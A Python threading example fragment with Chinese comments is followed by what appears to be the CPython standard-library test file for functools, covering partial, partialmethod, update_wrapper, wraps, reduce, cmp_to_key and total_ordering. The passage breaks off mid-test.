# current_thread 返回一个当前线程的实例
print("子线程%s结束..." % (threading.current_thread().name))
if __name__ == '__main__':
print("主线程%s启动..." % (threading.current_thread().name))
# 创建子线程
t = threading.Thread(target=run, args=(1,))
t.start()
t.join()
print("主线程%s结束..." % (threading.current_thread().name))
|
test_functools.py
|
import abc
import builtins
import collections
import copy
from itertools import permutations
import pickle
from random import choice
import sys
from test import support
import time
import unittest
import unittest.mock
from weakref import proxy
import contextlib
try:
import threading
except ImportError:
threading = None
import functools
py_functools = support.import_fresh_module('functools', blocked=['_functools'])
c_functools = support.import_fresh_module('functools', fresh=['_functools'])
decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
@contextlib.contextmanager
def replaced_module(name, replacement):
original_module = sys.modules[name]
sys.modules[name] = replacement
try:
yield
finally:
sys.modules[name] = original_module
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual(f'{name}({capture!r})', repr(f))
f = self.partial(capture, *args)
self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
def test_recursive_repr(self):
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
self.assertEqual(repr(f), '%s(...)' % (name,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle(self):
with self.AllowPickle():
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
def test_deepcopy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIsNot(f_copy.attr, f.attr)
self.assertIsNot(f_copy.args, f.args)
self.assertIsNot(f_copy.args[0], f.args[0])
self.assertIsNot(f_copy.keywords, f.keywords)
self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
def test_setstate(self):
f = self.partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(signature(f),
(capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), dict(a=10), None))
self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), None, None))
#self.assertEqual(signature(f), (capture, (1,), {}, {}))
self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
self.assertEqual(f(2), ((1, 2), {}))
self.assertEqual(f(), ((1,), {}))
f.__setstate__((capture, (), {}, None))
self.assertEqual(signature(f), (capture, (), {}, {}))
self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
self.assertEqual(f(2), ((2,), {}))
self.assertEqual(f(), ((), {}))
def test_setstate_errors(self):
f = self.partial(signature)
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
def test_setstate_subclasses(self):
f = self.partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
self.assertEqual(s, (capture, (1,), dict(a=10), {}))
self.assertIs(type(s[1]), tuple)
self.assertIs(type(s[2]), dict)
r = f()
self.assertEqual(r, ((1,), {'a': 10}))
self.assertIs(type(r[0]), tuple)
self.assertIs(type(r[1]), dict)
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
self.assertEqual(s, (capture, (1,), {}, {}))
self.assertIs(type(s[1]), tuple)
r = f(2)
self.assertEqual(r, ((1, 2), {}))
self.assertIs(type(r[0]), tuple)
def test_recursive_pickle(self):
with self.AllowPickle():
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.args[0], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.keywords['a'], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaises(TypeError, f.__setstate__, BadSequence())
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, type, value, tb):
return False
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
class TestPartialPy(TestPartial, unittest.TestCase):
partial = py_functools.partial
class AllowPickle:
def __init__(self):
self._cm = replaced_module("functools", py_functools)
def __enter__(self):
return self._cm.__enter__()
def __exit__(self, type, value, tb):
return self._cm.__exit__(type, value, tb)
if c_functools:
class CPartialSubclass(c_functools.partial):
pass
class PyPartialSubclass(py_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = CPartialSubclass
# partial subclasses are not optimized for nested calls
test_nested_optimization = None
class TestPartialPySubclass(TestPartialPy):
partial = PyPartialSubclass
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduce(unittest.TestCase):
if c_functools:
func = c_functools.reduce
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.func(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.func(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.func(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.func(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.func(add, Squares(10)), 285)
self.assertEqual(self.func(add, Squares(10), 0), 285)
self.assertEqual(self.func(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.func)
self.assertRaises(TypeError, self.func, 42, 42)
self.assertRaises(TypeError, self.func, 42, 42, 42)
self.assertEqual(self.func(42, "1"), "1") # func is never called with one item
self.assertEqual(self.func(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.func, 42, (42, 42))
self.assertRaises(TypeError, self.func, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.func, add, "")
self.assertRaises(TypeError, self.func, add, ())
self.assertRaises(TypeError, self.func, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.func, add, TestFailingIter())
self.assertEqual(self.func(add, [], None), None)
self.assertEqual(self.func(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.func, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.func(add, SequenceClass(5)), 10)
self.assertEqual(self.func(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.func, add, SequenceClass(0))
self.assertEqual(self.func(add, SequenceClass(0), 42), 42)
self.assertEqual(self.func(add, SequenceClass(1)), 0)
self.assertEqual(self.func(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.func(add, d), "".join(d.keys()))
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.subTest("LT < LE"), self.assertRaises(TypeError):
